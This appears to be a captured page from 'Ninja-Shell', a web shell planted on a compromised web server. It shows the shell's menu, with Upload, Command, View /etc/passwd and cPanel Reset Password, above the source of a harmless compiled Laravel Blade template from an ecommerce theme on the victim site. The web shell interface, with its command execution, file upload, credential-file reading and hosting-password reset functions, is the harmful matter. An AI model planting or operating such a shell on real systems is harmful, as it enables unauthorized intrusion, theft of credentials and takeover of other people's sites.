{Ninja-Shell}
Home
Info
Upload
Command
View /etc/passwd
cPanel Reset Password
Filename: /var/www///arsu_theme/storage/framework/views/b5345353fa443fef332a0f64d388ffd7.php
<?php $itemsPerRow = $shortcode->items_per_row ?: 4; $itemsPerRow = $shortcode->with_sidebar ? $itemsPerRow - 1 : $itemsPerRow; ?> <section class="tp-seller-area pb-30 pt-30"> <div class="container"> <?php echo Theme::partial('section-title', ['shortcode' => $shortcode, 'class' => 'text-center mb-40']); ?> <?php if($shortcode->with_sidebar): ?> <div class="row"> <div class="col-xl-4 col-lg-5"> <?php echo $__env->make(Theme::getThemeNamespace('partials.shortcodes.ecommerce-products.partials.sidebar'), \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?> </div> <div class="col-xl-8 col-lg-7"> <?php endif; ?> <?php echo $__env->make(Theme::getThemeNamespace('views.ecommerce.includes.product-items'), ['itemsPerRow' => $itemsPerRow], \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?> <?php if($shortcode->with_sidebar): ?> </div> </div> <?php endif; ?> <?php if(($buttonLabel = $shortcode->button_label) && ($buttonUrl = $shortcode->button_url)): ?> <div class="tp-seller-more text-center mt-10"> <a href="<?php echo e($buttonUrl); ?>" class="tp-btn tp-btn-border tp-btn-border-sm"> <?php echo BaseHelper::clean($buttonLabel); ?> </a> </div> <?php endif; ?> </div> </section> <?php /**PATH /var/www/arsu/platform/themes/shofy-fashion/partials/shortcodes/ecommerce-products/grid.blade.php ENDPATH**/ ?>
./Ninja\.